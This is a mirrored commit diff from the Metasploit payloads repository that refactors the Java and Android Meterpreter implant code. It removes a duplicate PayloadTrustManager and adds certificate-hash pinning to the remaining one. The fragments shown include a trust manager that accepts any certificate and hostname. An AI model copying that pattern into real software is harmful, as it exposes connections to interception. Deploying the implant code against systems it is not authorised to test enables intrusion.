mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-03-12 12:14:29 +01:00
remove duplicated PayloadTrustManager
This commit is contained in:
parent
d411bfc90b
commit
92a598101f
@ -15,6 +15,7 @@ import java.net.URL;
|
||||
import java.net.URLConnection;
|
||||
import java.util.concurrent.TimeUnit;
|
||||
|
||||
import com.metasploit.meterpreter.PayloadTrustManager;
|
||||
import dalvik.system.DexClassLoader;
|
||||
|
||||
public class Payload {
|
||||
@ -111,7 +112,7 @@ public class Payload {
|
||||
InputStream inStream;
|
||||
if (url.startsWith("https")) {
|
||||
URLConnection uc = new URL(url).openConnection();
|
||||
Class.forName("com.metasploit.stage.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, uc);
|
||||
PayloadTrustManager.useFor(uc, CERT_HASH);
|
||||
inStream = uc.getInputStream();
|
||||
} else {
|
||||
inStream = new URL(url).openStream();
|
||||
|
@ -143,11 +143,6 @@ public class AndroidMeterpreter extends Meterpreter {
|
||||
this.intervalCollectionManager.stop();
|
||||
}
|
||||
|
||||
@Override
|
||||
protected String getPayloadTrustManager() {
|
||||
return "com.metasploit.stage.PayloadTrustManager";
|
||||
}
|
||||
|
||||
@Override
|
||||
public String[] loadExtension(byte[] data) throws Exception {
|
||||
getCommandManager().resetNewCommands();
|
||||
|
@ -7,7 +7,6 @@ import com.metasploit.meterpreter.Meterpreter;
|
||||
import com.metasploit.meterpreter.TLVPacket;
|
||||
import com.metasploit.meterpreter.TLVType;
|
||||
import com.metasploit.meterpreter.command.Command;
|
||||
import com.metasploit.stage.PayloadTrustManager;
|
||||
|
||||
public class clipboard_set_data implements Command {
|
||||
|
||||
|
@ -17,7 +17,6 @@ public class HttpTransport extends Transport {
|
||||
private static final int PROXY_USER_LEN = 64;
|
||||
private static final int PROXY_PASS_LEN = 64;
|
||||
private static final int CERT_HASH_LEN = 20;
|
||||
private static final String TRUST_MANAGER = "com.metasploit.meterpreter.PayloadTrustManager";
|
||||
|
||||
private URL targetUrl = null;
|
||||
private URL nextUrl = null;
|
||||
@ -264,10 +263,12 @@ public class HttpTransport extends Transport {
|
||||
|
||||
if (this.targetUrl.getProtocol().equals("https")) {
|
||||
try {
|
||||
Class.forName(TRUST_MANAGER).getMethod("useFor", new Class[]{URLConnection.class})
|
||||
.invoke(null, new Object[]{conn});
|
||||
}
|
||||
catch (Exception ex) {
|
||||
String certHashHex = null;
|
||||
if (certHash != null) {
|
||||
certHashHex = PayloadTrustManager.bytesToHex(certHash);
|
||||
}
|
||||
PayloadTrustManager.useFor(conn, certHashHex);
|
||||
} catch (Exception ex) {
|
||||
// perhaps log?
|
||||
}
|
||||
}
|
||||
|
@ -220,10 +220,6 @@ public class Meterpreter {
|
||||
}
|
||||
}
|
||||
|
||||
protected String getPayloadTrustManager() {
|
||||
return "com.metasploit.meterpreter.PayloadTrustManager";
|
||||
}
|
||||
|
||||
/**
|
||||
* Get the command manager, used to register or lookup commands.
|
||||
*/
|
||||
|
@ -1,64 +0,0 @@
|
||||
package com.metasploit.meterpreter;
|
||||
|
||||
import java.net.URLConnection;
|
||||
|
||||
import javax.net.ssl.HostnameVerifier;
|
||||
import javax.net.ssl.HttpsURLConnection;
|
||||
import javax.net.ssl.SSLContext;
|
||||
import javax.net.ssl.SSLSession;
|
||||
import javax.net.ssl.SSLSocketFactory;
|
||||
import javax.net.ssl.TrustManager;
|
||||
import javax.net.ssl.X509TrustManager;
|
||||
|
||||
import java.security.cert.X509Certificate;
|
||||
|
||||
/**
|
||||
* Trust manager used for HTTPS URL connection. This is in its own class because it
|
||||
* depends on classes only present on Sun JRE 1.4+, and incorporating it into
|
||||
* the main {@link Meterpreter} class would have made it impossible for other/older
|
||||
* JREs to load it.
|
||||
* <p/>
|
||||
* This class is substantically identical to the metasploit.PayloadTrustManager class,
|
||||
* only that it tries to cache the ssl context and trust manager between calls.
|
||||
*/
|
||||
public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
|
||||
|
||||
public X509Certificate[] getAcceptedIssuers() {
|
||||
// no preferred issuers
|
||||
return new X509Certificate[0];
|
||||
}
|
||||
|
||||
public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType) {
|
||||
// trust everyone
|
||||
}
|
||||
|
||||
public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) {
|
||||
// trust everyone
|
||||
}
|
||||
|
||||
public boolean verify(String hostname, SSLSession session) {
|
||||
// trust everyone
|
||||
return true;
|
||||
}
|
||||
|
||||
private static PayloadTrustManager instance;
|
||||
private static SSLSocketFactory factory;
|
||||
|
||||
/**
|
||||
* Called by the {@link Payload} class to modify the given
|
||||
* {@link URLConnection} so that it uses this trust manager.
|
||||
*/
|
||||
public static synchronized void useFor(URLConnection uc) throws Exception {
|
||||
if (uc instanceof HttpsURLConnection) {
|
||||
HttpsURLConnection huc = ((HttpsURLConnection) uc);
|
||||
if (instance == null) {
|
||||
instance = new PayloadTrustManager();
|
||||
SSLContext sc = SSLContext.getInstance("SSL");
|
||||
sc.init(null, new TrustManager[]{instance}, new java.security.SecureRandom());
|
||||
factory = sc.getSocketFactory();
|
||||
}
|
||||
huc.setSSLSocketFactory(factory);
|
||||
huc.setHostnameVerifier(instance);
|
||||
}
|
||||
}
|
||||
}
|
@ -31,7 +31,7 @@
|
||||
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
|
||||
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
*/
|
||||
package com.metasploit.stage;
|
||||
package com.metasploit.meterpreter;
|
||||
|
||||
import java.net.URLConnection;
|
||||
|
||||
@ -51,11 +51,17 @@ import java.security.cert.X509Certificate;
|
||||
/**
|
||||
* Trust manager used for HTTPS stagers. This is in its own class because it
|
||||
* depends on classes only present on Sun JRE 1.4+, and incorporating it into
|
||||
* the main {@link Payload} class would have made it impossible for other/older
|
||||
* the main Payload class would have made it impossible for other/older
|
||||
* JREs to load it.
|
||||
*/
|
||||
public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
|
||||
|
||||
private String certHash;
|
||||
|
||||
private PayloadTrustManager(String certHash) {
|
||||
this.certHash = certHash;
|
||||
}
|
||||
|
||||
public X509Certificate[] getAcceptedIssuers() {
|
||||
// no preferred issuers
|
||||
return new X509Certificate[0];
|
||||
@ -86,7 +92,11 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
|
||||
public void checkServerTrusted(java.security.cert.X509Certificate[] certs,
|
||||
String authType) throws CertificateException {
|
||||
|
||||
String payloadHash = Payload.CERT_HASH.substring(4).trim();
|
||||
if (certHash == null) {
|
||||
// No HandlerSSLCert set on payload, trust everyone
|
||||
return;
|
||||
}
|
||||
String payloadHash = certHash.substring(4).trim();
|
||||
if (payloadHash.length() == 0) {
|
||||
// No HandlerSSLCert set on payload, trust everyone
|
||||
return;
|
||||
@ -112,13 +122,13 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
|
||||
}
|
||||
|
||||
/**
|
||||
* Called by the {@link Payload} class to modify the given
|
||||
* Called by the Payload class to modify the given
|
||||
* {@link URLConnection} so that it uses this trust manager.
|
||||
*/
|
||||
public static void useFor(URLConnection uc) throws Exception {
|
||||
public static void useFor(URLConnection uc, String certHash) throws Exception {
|
||||
if (uc instanceof HttpsURLConnection) {
|
||||
HttpsURLConnection huc = ((HttpsURLConnection) uc);
|
||||
PayloadTrustManager ptm = new PayloadTrustManager();
|
||||
PayloadTrustManager ptm = new PayloadTrustManager(certHash);
|
||||
SSLContext sc = SSLContext.getInstance("SSL");
|
||||
sc.init(null, new TrustManager[]{ptm},
|
||||
new java.security.SecureRandom());
|
Loading…
x
Reference in New Issue
Block a user